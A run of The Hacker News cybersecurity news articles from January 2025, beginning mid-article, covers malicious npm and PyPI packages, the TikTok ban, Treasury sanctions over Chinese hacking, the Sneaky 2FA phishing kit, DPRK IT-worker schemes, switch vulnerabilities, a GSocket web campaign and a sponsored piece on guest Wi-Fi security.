put together the massive trove of location data, and whether the company collected the data itself or from other data brokers. News of the breach comes weeks after the Federal Trade Commission banned Gravy Analytics and Venntel from collecting and selling Americans' location data without consumers' consent.CISA Issues a Series of Security Guidance The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is urging Operational Technology (OT) owners and operators to integrate secure-by-design elements into their procurement process by selecting manufacturers who prioritize security and meet various compliance standards. It's also advising companies to better detect and defend against advanced intrusion techniques by making use of Microsoft's newly introduced expanded cloud logs in Purview Audit (Standard). Separately, the agency has updated its Product Security Bad Practices guide to include three new bad practices on the use of known insecure or deprecated cryptographic functions, hard-coded credentials, and product support periods. "Software manufacturers should clearly communicate the period of support for their products at the time of sale," CISA said. "Software manufacturers should provide security updates through the entire support period." Lastly, it called on the U.S. government to take the necessary steps to bolster cybersecurity by closing the software understanding gap that, combined with the lack of secure-by-design software, can lead to the exploitation of vulnerabilities. The guidance comes as the European Union's Digital Operational Resilience Act, or DORA, entered into effect on January 17, 2025, requiring both financial services firms and their technology suppliers to improve their cybersecurity posture.Researchers Demonstrate Antifuse-based OTP Memory Attack A new study has found that data bits stored in an off-the-shelf Synopsys antifuse memory block used in Raspberry Pi's RP2350 microcontroller for storing secure boot keys and other sensitive configuration data can be extracted, thereby compromising secrets. The method relies on a "well-known semiconductor failure analysis technique: passive voltage contrast (PVC) with a focused ion beam (FIB)," IOActive said, adding the "the simple form of the attack demonstrated here recovers the bitwise OR of two physically adjacent memory bitcell rows sharing common metal 1 contacts." In a hypothetical physical cyber attack, an adversary in possession of an RP2350 device, as well as access to semiconductor deprocessing equipment and a focused ion beam (FIB) system, could extract the contents of the antifuse bit cells as plaintext in a matter of days.Biden Administration Issues Executive Order to Improve U.S. Cybersecurity Outgoing U.S. President Joe Biden signed a sweeping executive order that calls for securing federal communications networks against foreign adversaries; issuing tougher sanctions for ransomware gangs; requiring software and cloud providers to develop more secure products and follow secure software development practices; enabling encryption by default across email, instant messaging, and internet-based voice and video conferencing; adopting quantum-resistant encryption within existing networks; and using artificial intelligence (AI) to boost America's cyber defense capabilities. In a related development, the Commerce Department finalized a rule banning the sale or import of connected passenger vehicles that integrate certain software or hardware components from China or Russia. "Connected vehicles yield many benefits, but software and hardware sources from the PRC and other countries of concern pose grave national security risks," said National Security Advisor Jake Sullivan, noting the rule aims to protect its critical infrastructure and automotive supply chain. The White House said the move will help the U.S. defend itself against Chinese cyber espionage and intrusion operations. Over the past week, the Biden administration has also released an Interim Final Rule on Artificial Intelligence Diffusion that seeks to prevent the misuse of advanced AI technology by countries of concern. Expert WebinarSimplify, Automate, Secure: Digital Trust for EnterprisesManaging digital trust isn't just a challengeit's mission-critical. Hybrid systems, DevOps workflows, and compliance demands have outgrown traditional tools. DigiCert ONE is here to change the game.In this webinar, you'll discover how to:Simplify: Centralized certificate management to reduce complexity and risk.Automate: Streamline trust operations across systems.Secure: Meet compliance demands with advanced tools.Modernize: Keep up with DevOps with smarter software signing.From IoT to enterprise IT, DigiCert ONE equips you to secure every stage of digital trust. Watch NowP.S. Know someone who could use this? Share it. Cybersecurity ToolsAD-ThreatHunting: Detect and stop threats like password sprays, brute force attacks, and admin misuse with real-time alerts, pattern recognition, and smart analysis tools. With features like customizable thresholds, off-hours monitoring, and multi-format reporting, staying secure has never been easier. Plus, test your defenses with built-in attack simulations to ensure your system is always ready.OSV-SCALIBR: It is a powerful open-source library that builds on Google's expertise in vulnerability management, offering tools to secure your software at scale. It supports scanning installed packages, binaries, and source code across Linux, Windows, and Mac, while also generating SBOMs in SPDX and CycloneDX formats. With advanced features like container scanning, weak credential detection, and optimization for resource-constrained environments, OSV-SCALIBR makes it easier than ever to identify and manage vulnerabilities. Tip of the WeekMonitor, Detect, and Control Access with Free Solutions In today's complex threat landscape, advanced, cost-effective solutions like Wazuh and LAPS offer powerful defenses for small-to-medium enterprises. Wazuh, an open-source SIEM platform, integrates with the Elastic Stack for real-time threat detection, anomaly monitoring, and log analysis, enabling you to spot malicious activities early. Meanwhile, LAPS (Local Administrator Password Solution) automates the rotation and management of local admin passwords, reducing the risk of privilege escalation and ensuring that only authorized users can access critical systems. Together, these tools provide a robust, multi-layered defense strategy, giving you the ability to detect, respond to, and mitigate threats efficiently without the high cost of enterprise solutions.ConclusionThe digital world is full of challenges that need more than just staying alertthey need new ideas, teamwork, and toughness. With threats coming from governments, hackers, and even people inside organizations, the key is to be proactive and work together. This recap's events show us that cybersecurity is about more than defense; it's about creating a safe and trustworthy future for technology.Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.

Jan 20, 2025Ravie LakshmananSupply Chain Attack / SolanaCybersecurity researchers have identified three sets of malicious packages across the npm and Python Package Index (PyPI) repository that come with capabilities to steal data and even delete sensitive data from infected systems.The list of identified packages is below -@async-mutex/mutex, a typosquat of async-mute (npm)dexscreener, which masquerades as a library for accessing liquidity pool data from decentralized exchanges (DEXs) and interacting with the DEX Screener platform (npm)solana-transaction-toolkit (npm)solana-stable-web-huks (npm)cschokidar-next, a typosquat of chokidar (npm)achokidar-next, a typosquat of chokidar (npm)achalk-next, a typosquat of chalk (npm)csbchalk-next, a typosquat of chalk (npm)cschalk, a typosquat of chalk (npm)pycord-self, a typosquat of discord.py-self (PyPI)Supply chain security company Socket, which discovered the packages, said the first four packages are designed to intercept Solana private keys and transmit them through Gmail's Simple Mail Transfer Protocol (SMTP) servers with the likely goal of draining victims' wallets.Particularly, the packages solana-transaction-toolkit and solana-stable-web-huks programmatically deplete the wallet, automatically transferring up to 98% of its contents to an attacker-controlled Solana address, while claiming to offer Solana-specific functionality."Because Gmail is a trusted email service, these exfiltration attempts are less likely to be flagged by firewalls or endpoint detection systems, which treat smtp.gmail.com as legitimate traffic," security researcher Kirill Boychenko said.Socket said it also came across two GitHub repositories published by the threat actors behind solana-transaction-toolkit and solana-stable-web-huks that purport to contain Solana development tools or scripts for automating common DeFi workflows, but, in reality, import the threat actor's malicious npm packages.The GitHub accounts associated with these repositories, "moonshot-wif-hwan" and "Diveinprogramming," are no longer accessible."A script in the threat actor's GitHub repository, moonshot-wif-hwan/pumpfun-bump-script-bot, is promoted as a bot for trading on Raydium, a popular Solana-based DEX, but instead it imports malicious code from solana-stable-web-huks package," Boychenko said.The use of malicious GitHub repositories illustrates the attackers' attempts to stage a broader campaign beyond npm by targeting developers who might be searching for Solana-related tools on the Microsoft-owned code hosting platform.The second set of npm packages have been found to take their malicious functionality to the next level by incorporating a "kill switch" function that recursively wipes all files in project-specific directories, in addition to exfiltrating environment variables to a remote server in some cases.The counterfeit csbchalk-next package functions identically to the typosquatted versions of chokidar, the only difference being that it only initiates the data deletion operation after it receives the code "202" from the server.Pycord-self, on the other hand, singles out Python developers looking to integrate Discord APIs into their projects, capturing Discord authentication tokens and connecting to an attacker-controlled server for persistent backdoor access post installation on both Windows and Linux systems.The development comes as bad actors are targeting Roblox users with fraudulent libraries engineered to facilitate data theft using open-source stealer malware such as Skuld and Blank-Grabber. Last year, Imperva revealed that Roblox players on the lookout for game cheats and mods have also been targeted by bogus PyPI packages that trick them into downloading the same payloads.Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 19, 2025Ravie LakshmananSocial Media / Data PrivacyPopular video-sharing social network TikTok has officially gone dark in the United States, 2025, as a federal ban on the app comes into effect on January 19, 2025."We regret that a U.S. law banning TikTok will take effect on January 19 and force us to make our services temporarily unavailable," the company said in a pop-up message. "We're working to restore our service in the U.S. as soon as possible, and we appreciate your support. Please stay tuned."An immediate outcome of the ban means that existing users will no longer be able to access TikTok content, and new users won't be able to download the app from the official app stores for Android and iOS. Other apps from its parent company ByteDance, including CapCut, Lemon8, and Gauth, have become unavailable as well.The development comes days after the U.S. Supreme Court ruled unanimously to uphold a law requiring that its ByteDance sell TikTok or see it be effectively blocked in the country due to national security reasons and fears that its recommendation algorithm could be vulnerable to manipulation by Chinese authorities.The court further noted that TikTok's scale and susceptibility to foreign adversary control, coupled with the vast amounts of personal information that it collects about users, merits a "differential treatment" with regards to First Amendment rights."There is no doubt that, for more than 170 million Americans, TikTok offers a distinctive and expansive outlet for expression, means of engagement, and source of community," the court wrote in its decision."But Congress has determined that divestiture is necessary to address its well-supported national security concerns regarding TikTok's data collection practices and relationship with a foreign adversary."Following the ruling, the White House said TikTok should remain available to U.S. users either under American ownership or another entity that addresses the national security concerns identified by Congress in developing the law. The legislation was formally passed in April 2024.The law was the culmination of a yearslong debate that TikTok's Chinese ownership raises the risk that data on U.S. users could fall into the hands of Beijing or be used for pushing propaganda. TikTok has repeatedly maintained it operates independently of the government and has not received any requests about its data, while ByteDance has said it has no plans to divest the business."The Court's decision enables the Justice Department to prevent the Chinese government from weaponizing TikTok to undermine America's national security," said Attorney General Garland. "Authoritarian regimes should not have unfettered access to millions of Americans' sensitive data."The Electronic Frontier Foundation (EFF), in a statement, expressed disappointment at the Supreme Court's decision to upload the TikTok ban, stating there are several ways that America's foes could steal, scrape, or buy its citizens' data."The ban or forced sale of one social media app will do virtually nothing to protect Americans' data privacy only comprehensive consumer privacy legislation can achieve that goal," the EFF said."Shutting down communications platforms or forcing their reorganization based on concerns of foreign propaganda and anti-national manipulation is an eminently anti-democratic tactic, one that the US has previously condemned globally."However, there are indications the app may get a reprieve. Speaking to NBC News, U.S. President-elect Donald Trump said on Saturday he would "most likely" give TikTok a 90-day extension from the ban after he takes office on Monday.TikTok has faced similar issues in several countries, most famously leading to an outright ban in India in June 2020. Late last year, the Canadian government ordered TikTok to dissolve its operations in the country, citing national security risks.That said, the TikTok blockade has had the unintended consequence of users migrating to other Chinese alternatives such as RedNote (aka Xiaohongshu), rather than Instagram and YouTube, likely posing a fresh challenge for lawmakers concerned about foreign influence or interference via social media."I'm concerned that Americans are flocking to a number of adversary-owned social media platforms," Virginia Senator Mark Warner said in a post on Bluesky. "We still need a comprehensive and risk-based approach to assessing and mitigating the risks of foreign-owned apps."Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 18, 2025Ravie LakshmananCyber Espionage / Telecom SecurityThe U.S. Treasury Department's Office of Foreign Assets Control (OFAC) has imposed sanctions against a Chinese cybersecurity company and a Shanghai-based cyber actor for their alleged links to the Salt Typhoon group and the recent compromise of the federal agency."People's Republic of China-linked (PRC) malicious cyber actors continue to target U.S. government systems, including the recent targeting of Treasury's information technology (IT) systems, as well as sensitive U.S. critical infrastructure," the Treasury said in a press release.The sanctions target Yin Kecheng, who is assessed to have been a cyber actor for over a decade and affiliated with China's Ministry of State Security (MSS). Kecheng, per the Treasury, was associated with the breach of its own network that came to light earlier this month.The incident involved a hack of BeyondTrust's systems that allowed the threat actors to infiltrate some of the company's Remote Support SaaS instances by making use of a compromised Remote Support SaaS API key. The activity has been attributed to a nation-state group named Silk Typhoon (formerly Hafnium), which was linked to the then zero-day exploitation of multiple security flaws (aka ProxyLogon) in Microsoft Exchange Server in early 2021.According to a recent report from Bloomberg, the attackers are said to have broken into no less than 400 computers belonging to the Treasury and stole over 3,000 files, including policy and travel documents, organizational charts, material on sanctions and foreign investment, and 'Law Enforcement Sensitive' data.They also gained unauthorized access to computers used by Secretary Janet Yellen, Deputy Secretary Adewale Adeyemo, and Acting Under Secretary Bradley T. Smith, as well as material on investigations run by the Committee on Foreign Investment in the U.S., the report added. It's believed that Silk Typhoon overlaps with a cluster tracked by Google-owned Mandiant under the moniker UNC5221, a China-nexus espionage actor known for its extensive weaponization of Ivanti zero-day vulnerabilities. The Hacker News has reached out to Mandiant for further comment, and we will update the story if we hear back.The sanctions also target Sichuan Juxinhe Network Technology Co., LTD., a Sichuan-based cybersecurity company that the Treasury said was directly involved in a series of cyber attacks aimed at major U.S. telecommunication and internet service provider companies in the country.The activity has been associated with a different Chinese hacking group named Salt Typhoon (aka Earth Estries, FamousSparrow, GhostEmperor, and UNC2286). The threat actor is estimated to be active since at least 2019."The MSS has maintained strong ties with multiple computer network exploitation companies, including Sichuan Juxinhe," the Treasury said.Separately, the Department of State's Rewards for Justice program is offering a reward of up to $10 million for information that could lead to the identification or location of any individuals who are acting at the direction or under the control of a foreign state-sponsored adversary and engage in malicious cyber activities against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act."The Treasury Department will continue to use its authorities to hold accountable malicious cyber actors who target the American people, our companies, and the United States government, including those who have targeted the Treasury Department specifically," Adeyemo said in a statement.The attacks on U.S. telecom service providers has since prompted the Federal Communications Commission (FCC) to issue new rules requiring companies operating in the sector to secure their networks from unlawful access or interception of communications. Outgoing FCC chairwoman Jessica Rosenworcel described the hacks as "one of the largest intelligence compromises ever seen.""That action is accompanied by a proposal to require communications service providers to submit an annual certification to the FCC attesting that they have created, updated, and implemented a cybersecurity risk management plan, which would strengthen communications from future cyber attacks," the FCC said.Earlier this week, Jen Easterly, director of the Cybersecurity and Infrastructure Security Agency (CISA), said "China's sophisticated and well-resourced cyber program represents the most serious and significant cyber threat to our nation, and in particular, U.S. critical infrastructure."Easterly also revealed that Salt Typhoon was first detected on federal networks, much before the cyber espionage group burrowed into the networks of AT&T, Lumen Technologies, T-Mobile, Verizon, and other providers.The designations are just the latest in a long list of moves made by the Treasury in a bid to combat malicious cyber activity by Chinese threat actors. Previously sanctioned by the agency are three other companies, Integrity Technology Group (Flax Typhoon), Sichuan Silence Information Technology (Pacific Rim), and Wuhan Xiaoruizhi Science and Technology Company (APT31).Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 17, 2025Ravie LakshmananCybersecurity / Threat IntelligenceCybersecurity researchers have detailed a new adversary-in-the-middle (AitM) phishing kit that's capable of Microsoft 365 accounts with an aim to steal credentials and two-factor authentication (2FA) codes since at least October 2024.The nascent phishing kit has been dubbed Sneaky 2FA by French cybersecurity company Sekoia, which detected it in the wild in December. Nearly 100 domains hosting Sneaky 2FA phishing pages have been identified as of this month, suggesting moderate adoption by threat actors."This kit is being sold as phishing-as-a-service (PhaaS) by the cybercrime service 'Sneaky Log,' which operates through a fully-featured bot on Telegram," the company said in an analysis. "Customers reportedly receive access to a licensed obfuscated version of the source code and deploy it independently."Phishing campaigns have been observed sending payment receipt-related emails to entice recipients into opening bogus PDF documents containing QR code that, upon scanning, redirects them to Sneaky 2FA pages.Sekoia said the phishing pages are hosted on compromised infrastructure, mostly involving WordPress websites and other domains controlled by the attacker. The fake authentication pages are designed to automatically populate the victim's email address to elevate their legitimacy.The kit also boasts of several anti-bot and anti-analysis measures, employing techniques like traffic filtering and Cloudflare Turnstile challenges to ensure that only victims who meet certain criteria are directed to the credential harvesting pages. It further runs a series of checks to detect and resist analysis attempts using web browser developer tools. A notable aspect of the PhaaS is that site visitors whose IP address originates from a data center, cloud provider, bot, proxy, or VPN are directed to a Microsoft-related Wikipedia page using the href[.]li redirection service. This has led TRAC Labs to give it the name WikiKit."The Sneaky 2FA phishing kit employs several blurred images as the background for its fake Microsoft authentication pages," Sekoia explained. "By using screenshots of legitimate Microsoft interfaces, this tactic is intended to deceive users into authenticating themselves to gain access to the blurred content."Further investigation has revealed that the phishing kit relies on a check with a central server, likely the operator, that makes sure that the subscription is active. This indicates that only customers with a valid license key can use Sneaky 2FA to conduct phishing campaigns. The kit is advertised for $200 per month.That's not all. Source code references have also been unearthed pointing to a phishing syndicate named W3LL Store, which was previously exposed by Group-IB in September 2023 as behind a phishing kit called W3LL Panel and various tools for conducting business email compromise (BEC) attacks.This, along with similarities in the AitM relay implementation, has also raised the possibility that Sneaky 2FA may be based on the W3LL Panel. The latter also operates under a similar licensing model that requires periodic checks with a central server.In an interesting twist, some of the Sneaky 2FA domains were previously associated with known AitM phishing kits, such as Evilginx2 and Greatness an indication that at least a few cyber criminals have migrated to the new service."The phishing kit uses different hardcoded User-Agent strings for the HTTP requests depending on the step of the authentication flow," Sekoia researchers said. "This behavior is rare in legitimate user authentication, as a user would have to perform successive steps of the authentication from different web browsers.""While User-Agent transitions occasionally happen in legitimate situations (e.g., authentication initiated in desktop applications that launch a web browser or WebView to handle MFA), the specific sequence of User-Agents used by Sneaky 2FA does not correspond to a realistic scenario, and offers a high-fidelity detection of the kit."Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 17, 2025Ravie LakshmananInsider Threat / CryptocurrencyThe U.S. Treasury Department's Office of Foreign Assets Control (OFAC) sanctioned two individuals and four entities for their alleged involvement in illicit revenue generation schemes for the Democratic People's Republic of Korea (DPRK) by dispatching IT workers around the world to obtain employment and draw a steady source of income for the regime in violation of international sanctions."These IT workers obfuscate their identities and locations to fraudulently obtain freelance employment contracts from clients around the world for IT projects, such as software and mobile application development," the Treasury Department said."The DPRK government withholds up to 90% of the wages earned by these overseas workers, thereby generating annual revenues of hundreds of millions of dollars for the Kim regime's weapons programs to include weapons of mass destruction (WMD) and ballistic missile programs."The action represents the latest salvo in the U.S. government's ongoing efforts to crack down on the various financially motivated streams that aim to further Pyongyang's strategic objectives. The individuals and companies that have been sanctioned by OFAC are listed below -Department 53 of The Ministry of the People's Armed Forces, which is said to generate revenue using front companies related to IT and software development Korea Osong Shipping Co, a Department 53 front company that maintained DPRK IT workers in Laos since at least 2022Chonsurim Trading Corporation, a Department 53 front company that has maintained another group of DPRK IT workers in LaosLiaoning China Trade Industry Co., Ltd, a China-based company that has shipped Department 53 equipment, viz. notebook and desktop computers, graphics cards, HDMI cables, and network equipment, to facilitate IT worker activity abroadJong In Chol, the president of Chonsurim's DPRK IT worker delegation in LaosSon Kyong Sik, a China-based chief representative of Korea Osong Shipping CoBoth the front companies are alleged to have used false identities and aliases to communicate with clients and undertake software development work for companies across the world.The fraudulent IT worker scheme attracted mainstream attention in 2023, although it's believed that such operations have been ongoing since at least 2018, when the Treasury sanctioned two companies Yanbian Silverstar and Volasys Silver Star for the "exportation of workers from North Korea, including exportation to generate revenue for the Government of North Korea or the Workers' Party of Korea."The activity cluster is tracked by the cybersecurity community under the monikers Famous Chollima, Nickel Tapestry, UNC5267, and Wagemole.Recent analyses have found that North Korean IT workers have been increasingly infiltrating cryptocurrency and Web3 companies and "compromising their networks, operations, and integrity." The insider threat operation has also identified people in the U.S. who are willing to support their schemes by running laptop farms in exchange for a monthly fee.Heightened public disclosures about these campaigns have further led to a surge in extortion attempts by stealing intellectual property from the companies they work for and demanding "more cryptocurrency than they ever have before" for not releasing it publicly or giving it away to rivals, Google-owned Mandiant told The Record. That having said, the IT worker operation is just one of the many methods North Korea employs to illegally generate revenue. DPRK state-sponsored hacking groups have a long history of targeting developers with job-themed lures to deliver various kinds of malware that are capable of facilitating data and cryptocurrency theft."The DPRK continues to rely on its thousands of overseas IT workers to generate revenue for the regime, to finance its illegal weapons programs, and to enable its support of Russia's war in Ukraine," said Acting Under Secretary of the Treasury for Terrorism and Financial Intelligence Bradley T. Smith."The United States remains resolved to disrupt these networks, wherever they operate, that facilitate the regime's destabilizing activities."Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 17, 2025Ravie LakshmananFirmware Security / VulnerabilityCybersecurity researchers have disclosed three security flaws in Planet Technology's WGS-804HPT industrial switches that could be chained to achieve pre-authentication remote code execution on susceptible devices."These switches are widely used in building and home automation systems for a variety of networking applications," Claroty's Tomer Goldschmidt said in a Thursday report. "An attacker who is able to remotely control one of these devices can use them to further exploit devices in an internal network and do lateral movement."The operational technology security firm, which carried out an extensive analysis of the firmware used in these switches using the QEMU framework, said the vulnerabilities are rooted in the dispatcher.cgi interface used to provide a web service. The list of flaws is below -CVE-2024-52558 (CVSS score: 5.3) - An integer underflow flaw that can allow an unauthenticated attacker to send a malformed HTTP request, resulting in a crashCVE-2024-52320 (CVSS score: 9.8) - An operating system command injection flaw that can allow an unauthenticated attacker to send commands through a malicious HTTP request, resulting in remote code executionCVE-2024-48871 (CVSS score: 9.8) - A stack-based buffer overflow flaw that can allow an unauthenticated attacker to send a malicious HTTP request, resulting in remote code executionSuccessful exploitation of the flaws could permit an attacker to hijack the execution flow by embedding a shellcode in the HTTP request and gain the ability to execute operating system commands.Following responsible disclosure, the Taiwanese company has rolled out patches for the shortcomings with version 1.305b241111 released on November 15, 2024.Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 17, 2025Ravie LakshmananWeb Security / BotnetCybersecurity researchers have exposed a new campaign that targets web servers running PHP-based applications to promote gambling platforms in Indonesia."Over the past two months, a significant volume of attacks from Python-based bots has been observed, suggesting a coordinated effort to exploit thousands of web apps," Imperva researcher Daniel Johnston said in an analysis. "These attacks appear tied to the proliferation of gambling-related sites, potentially as a response to the heightened government scrutiny."The Thales-owned company said it has detected millions of requests originating from a Python client that includes a command to install GSocket (aka Global Socket), an open-source tool that can be used to establish a communication channel between two machines regardless of the network perimeter.It's worth noting that GSocket has been put to use in many a cryptojacking operation in recent months, not to mention even exploiting the access provided by the utility to insert malicious JavaScript code on sites to steal payment information.The attack chains particularly involve attempts to deploy GSocket by leveraging web pre-existing web shells installed on already compromised servers. A majority of the attacks have been found to single out servers running a popular learning management system (LMS) called Moodle.A noteworthy aspect of the attacks are the additions to bashrc and crontab system files to ensure that GSocket is actively running even after the removal of the web shells.It has been determined that the access afforded by GSocket to these target servers is weaponized to deliver PHP files that contain HTML content referencing online gambling services particularly aimed at Indonesian users."At the top of each PHP file was PHP code designed to allow only search bots to access the page, but regular site visitors would be redirected to another domain," Johnston said. "The objective behind this is to target users searching for known gambling services, then redirect them to another domain."Imperva said the redirections lead to "pktoto[.]cc," a known Indonesian gambling site.The development comes as c/side revealed a widespread malware campaign that has targeted over 5,000 sites globally to create unauthorized administrator accounts, install a malicious plugin from a remote server, and siphon credential data back to it.The exact initial access vector used to deploy the JavaScript malware on these sites is presently not known. The malware has been codenamed WP3.XYZ in reference to the domain name that's associated with the server used to fetch the plugin and exfiltrate data ("wp3[.]xyz").To mitigate against the attack, it's recommended that WordPress site owners keep their plugins up-to-date, block the rogue domain using a firewall, scan for suspicious admin accounts or plugins, and remove them.Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 17, 2025The Hacker NewsThreat Detection / Zero TrustRecent data breaches have highlighted the critical need to improve guest Wi-Fi infrastructure security in modern business environments. Organizations face increasing pressure to protect their networks while providing convenient access to visitors, contractors, temporary staff, and employees with BYOD. Implementing secure guest Wi-Fi infrastructure has become essential for authenticating access, protecting data, maintaining compliance across all geographies, and ensuring business continuity.Evolved security solutions now combine zero-trust architecture with cloud-based captive portals to enhance network protection. These systems enable organizations to implement strict access controls, verify every device's security status, and maintain network separation. Through advanced features like conditional access and device registration, businesses can now offer secure guest Wi-Fi access while maintaining complete visibility and control over their network resources.Challenges in Wi-Fi Security TodayDistributed organizations implementing guest Wi-Fi networks face increasingly sophisticated security challenges. The complexity of implementing and managing secure guest Wi-Fi access while maintaining network integrity has become a critical concern for both IT administrators and Security practitioners.Common security vulnerabilitiesModern guest Wi-Fi networks face several significant security threats:Lack of Network Micro-Segmentation: Networks for unmanaged/unsecured devices often share the same infrastructure as networks for managed/corporate devices without proper isolation. This increases the risk of unauthorized access to sensitive systems or data.Weak Encryption: Most of Guest Wi-Fi Networks use "Open" authentication which may introduce a source of attack during spoofing. It's recommended to use WPA3 and OWE encryption to enforce the security for clients during association.Man-in-the-Middle (MITM) Attacks: Attackers can exploit unsecured Guest Wi-Fi to intercept communications, steal credentials, or inject malicious data.Inadequate Authentication: Some networks use too simple shared passwords or no authentication at all, making it extremely easy for attackers to connect and launch attacks.Rogue Access Points (APs): Attackers can set up rogue APs mimicking legitimate Guest Wi-Fi to lure users and steal sensitive information.If not properly secured, the Wi-Fi guest networks pose significant security risks. Weak access controls allow unauthorized users to exploit the network, leading to data interception and man-in-the-middle attacks. A critical issue is the lack of network segmentation; without proper isolation, attackers on the guest network may access internal systems, risking data breaches.Insufficient authentication and weak password practices further heighten vulnerabilities, enabling unauthorized access. To mitigate these risks, organizations should implement VLANs, strict authentication, and active monitoring. A well-segmented guest network helps maintain security while offering convenient access to visitors.Why is BYOD the most critical category to monitor?BYOD introduces a mix of unmanaged and potentially insecure devices into the network. These devices often lack corporate-level security controls and might already be compromised with malware, creating a direct entry point for attackers once connected to the network. If the attacker has access to the network through a BYOD, sensitive corporate data accessed via BYOD devices may increase the likelihood of unintentional or malicious data leakage.Here is a summary of the potential actions that can be implemented to mitigate such issues :Proper Network SegmentationAsset inventoryEncryptionAuthentication Mechanism (like Captive Portal)Profiled Security PoliciesMonitoring and Threat DetectionZero Trust ApproachPotential consequences for businessesSecurity breaches in guest Wi-Fi networks can have devastating impacts on organizations. Recent studies indicate that 40% of businesses have experienced information compromise through public Wi-Fi networks. The financial implications are significant, with some companies reporting ransomware payments exceeding $1 million to recover their data.Beyond immediate financial losses, businesses face:Damage to brand reputation and customer trustDisruption of normal business operationsPotential loss of intellectual propertyCompromise of internal network resourcesLegal and compliance considerationsOrganizations must navigate complex regulatory requirements when implementing guest Wi-Fi management systems. The legal framework includes multiple layers of compliance, they need to warrant the security level for their network while ensuring the confidentiality of the users' data, and they need to cooperate with the authorities when required while complying with limited data retention period obligation. It is even more difficult for international organizations because they need to monitor and stay updated on any regulations' changes in various countries and jurisdictions, operating at international levels creates diverse and even contradictory obligations, for example, the data retention policies are different among countries, in France, it is required to retain data logs for 1 year, but it is 6 years in Italy, while the General Data Protection Regulations (GDPR) requires users' data to be deleted after the purposes have been achieved. Some key regulations need to be taken into consideration: Therefore, businesses must implement proper documentation, monitoring systems, and security controls to maintain compliance with these regulations. Regular security audits and network infrastructure updates are essential to maintaining legal compliance while providing secure guest access.Leveraging Cloud Captive Portals for Enhanced SecurityCloud-based captive portal solutions have emerged as a cornerstone of modern network security infrastructure. These sophisticated systems provide organizations with centralized control over guest access while maintaining robust security protocols.How Cloud Captive Portals WorkCloud-captive portals function as gateway systems that authenticate users before granting network access. The system intercepts initial connection attempts and redirects users to a secure login page. Organizations can implement various authentication methods, including:Social login integrationSponsorDeclarative EmailSMS AuthenticationThese solutions operate without additional hardware requirements, making them infrastructure-agnostic and instantly deployable across global locations.Integration with Zero Trust frameworksModern Cloud Captive Portals should align seamlessly with Zero Trust security principles by implementing continuous verification and limited access protocols. The integration enables:Device Profiling & AuthenticationIntegrity Access Control Policy EnforcementAutomationTraffic Monitoring & ComplianceRequired security features to deploy a cloud captive portals solutionModern captive portal solutions shall incorporate multiple layers of security protection. Innovative solutions now integrate with leading security solutions, enabling administrators to implement granular access controls and URL filtering.Cloudi-Fi platform supports comprehensive compliance requirements through regional data center deployment, ensuring adherence to local privacy regulations. Automated encryption of personal data and transparent collection processes provide users and administrators complete control over information handling.Advanced features include integration with cloud-based security platforms, enabling:Cloud firewall implementationContent filtering capabilitiesBandwidth ControlAutomated device onboardingThese capabilities offer a robust security framework that protects both the organization's network and user data while maintaining seamless access for authorized users.Benefits of a Zero Trust Captive Portal SolutionThe implementation of Zero Trust Architecture represents a paradigm shift in securing guest Wi-Fi networks, moving away from traditional perimeter-based security to a more comprehensive verification model. This approach fundamentally changes how organizations manage and secure guest network access.Zero Trust Cloud Captive Portal solutions provide a scalable, centralized access control layer across multiple sites or large office campuses. By leveraging cloud-based infrastructure, they allow seamless deployment without needing extensive on-prem hardware, ensuring consistent policy enforcement and secure, device-specific access. The cloud-based platform dynamically scales to handle high volumes of traffic and multiple entry points, while continuously monitoring user behaviors. This architecture not only simplifies management but also enhances security, as threats are isolated, and access is tightly controlled based on identity, device, and risk assessment, all through a unified, cloud-driven approach.Adapting Zero Trust principles for guest accessOrganizations must carefully adapt Zero Trust principles to maintain security while ensuring a seamless guest experience. The implementation requires a balanced approach that considers security requirements and user convenience. Key adaptation strategies include:Role-based permissions for the access controlSponsoring, social login with MFA, mail address, for user authenticationSegmentation for network isolationTime-limited access tokens for session managementBenefits of traditional security modelsZero Trust Architecture offers significant advantages compared to conventional security approaches. The model eliminates the inherent vulnerabilities of traditional perimeter-based security by implementing continuous verification and granular access controls.The transformation from traditional to zero-trust security brings multiple operational improvements:Enhanced Security PostureElimination of lateral movement threatsReal-time threat detection and responseComprehensive audit trailsOperational EfficiencyAutomated device onboardingCentralized policy managementSimplified compliance reportingThe architecture's ability to maintain strict security controls while supporting dynamic access requirements makes it particularly effective for guest Wi-Fi environments. By implementing least-privilege access principles, organizations can ensure that guests receive only the necessary network resources while maintaining complete visibility and control over all network activities.Integrating Zero Trust principles with cloud-based management platforms enables distributed organizations to effortlessly scale their guest Wi-Fi security efficiently. This combination offers network and security administrators powerful tools for monitoring network usage, enforcing security policies, and responding to potential threats in real time.ConclusionThe transformation of guest Wi-Fi security through cloud-captive portals and Zero Trust Architecture marks a significant advancement in corporate network protection. Modern organizations require robust security solutions that extend beyond traditional perimeter defenses. The combination of continuous verification, granular access controls, and advanced monitoring capabilities creates a comprehensive security framework that addresses current and emerging threats while maintaining operational efficiency.Business leaders must recognize the critical role of secure guest Wi-Fi in maintaining regulatory compliance and protecting sensitive data. Organizations ready to strengthen their network security should consider implementing a Zero Trust Captive Portal solution - Cloudi-Fi offers extensive resources and guidance for this essential security upgrade. This strategic approach positions businesses to meet future security challenges while providing secure, seamless guest access that supports operational goals and protects valuable digital assets.Note: This article is expertly written and contributed by RJ Singh, Chief Revenue Officer at Cloudi-Fi, with extensive experience in sales leadership and business development, and Simon Mesnage, Senior Network Engineer with 8 years of expertise in Wi-Fi infrastructure design and troubleshooting.Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

